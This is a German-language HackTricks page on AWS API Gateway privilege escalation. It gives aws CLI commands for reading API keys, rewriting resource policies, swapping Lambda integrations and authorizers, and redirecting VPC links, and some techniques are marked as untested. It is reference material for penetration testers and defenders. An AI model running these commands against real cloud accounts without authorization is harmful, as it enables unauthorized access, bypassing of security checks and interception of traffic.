AWS - Apigateway Privesc

Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks im PDF-Format herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
Holen Sie sich das offizielle PEASS & HackTricks-Merch
Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.

Apigateway

Für weitere Informationen siehe:

`apigateway:POST`

Mit dieser Berechtigung können Sie API-Schlüssel der konfigurierten APIs generieren (pro Region).

aws --region <region> apigateway create-api-key

Potenzielle Auswirkungen: Mit dieser Technik können Sie keine Privilegien eskalieren, aber Sie könnten Zugriff auf sensible Informationen erhalten.

`apigateway:GET`

Mit dieser Berechtigung können Sie generierte API-Schlüssel der konfigurierten APIs abrufen (pro Region).

aws --region apigateway get-api-keys
aws --region <region> apigateway get-api-key --api-key <key> --include-value

Potenzielle Auswirkungen: Mit dieser Technik können Sie keine Privilegien eskalieren, aber Sie könnten Zugriff auf sensible Informationen erhalten.

`apigateway:UpdateRestApiPolicy`, `apigateway:PATCH`

Mit diesen Berechtigungen ist es möglich, die Ressourcenrichtlinie einer API zu ändern, um sich selbst Zugriff zu geben, um sie aufzurufen und potenziellen Zugriff auf das API-Gateway zu missbrauchen (zum Beispiel das Aufrufen einer anfälligen Lambda-Funktion).

aws apigateway update-rest-api \
--rest-api-id api-id \
--patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"'

Potenzielle Auswirkungen: In der Regel können Sie mit dieser Technik nicht direkt eine Privilege Escalation durchführen, aber Sie könnten Zugriff auf sensible Informationen erhalten.

`apigateway:PutIntegration`, `apigateway:CreateDeployment`, `iam:PassRole`

Benötigt Tests

Ein Angreifer mit den Berechtigungen apigateway:PutIntegration, apigateway:CreateDeployment und iam:PassRole kann eine neue Integration zu einer vorhandenen API Gateway REST-API mit einer Lambda-Funktion hinzufügen, die über eine angehängte IAM-Rolle verfügt. Der Angreifer kann dann die Lambda-Funktion auslösen, um beliebigen Code auszuführen und möglicherweise Zugriff auf die Ressourcen zu erlangen, die mit der IAM-Rolle verbunden sind.

API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"
LAMBDA_ROLE_ARN="arn:aws:iam::account-id:role/lambda-role"

# Add a new integration to the API Gateway REST API
aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --type AWS_PROXY --integration-http-method POST --uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations --credentials $LAMBDA_ROLE_ARN

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potenzielle Auswirkungen: Zugriff auf Ressourcen, die mit der IAM-Rolle der Lambda-Funktion verbunden sind.

`apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment`

Erfordert Tests

Ein Angreifer mit den Berechtigungen apigateway:UpdateAuthorizer und apigateway:CreateDeployment kann einen vorhandenen API Gateway-Autorisierer ändern, um Sicherheitsüberprüfungen zu umgehen oder beliebigen Code auszuführen, wenn API-Anfragen gestellt werden.

API_ID="your-api-id"
AUTHORIZER_ID="your-authorizer-id"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"

# Update the API Gateway authorizer
aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZER_ID --authorizer-uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potenzielle Auswirkungen: Umgehung von Sicherheitsüberprüfungen, unbefugter Zugriff auf API-Ressourcen.

`apigateway:UpdateVpcLink`

Muss getestet werden

Ein Angreifer mit der Berechtigung apigateway:UpdateVpcLink kann einen vorhandenen VPC-Link ändern, um auf einen anderen Network Load Balancer zu verweisen, der möglicherweise den privaten API-Verkehr auf unbefugte oder bösartige Ressourcen umleitet.

bashCopy codeVPC_LINK_ID="your-vpc-link-id"
NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188"

# Update the VPC Link
aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op=replace,path=/targetArns,value="[$NEW_NLB_ARN]"

Potenzielle Auswirkungen: Unbefugter Zugriff auf private API-Ressourcen, Abfangen oder Störung des API-Verkehrs.

Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks im PDF-Format herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
Holen Sie sich das offizielle PEASS & HackTricks-Merch
Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories einreichen.

PreviousAWS - Privilege Escalation NextAWS - Chime Privesc

Last updated 2 months ago

Apigateway

apigateway:POST

apigateway:GET

apigateway:UpdateRestApiPolicy, apigateway:PATCH

apigateway:PutIntegration, apigateway:CreateDeployment, iam:PassRole

apigateway:UpdateAuthorizer, apigateway:CreateDeployment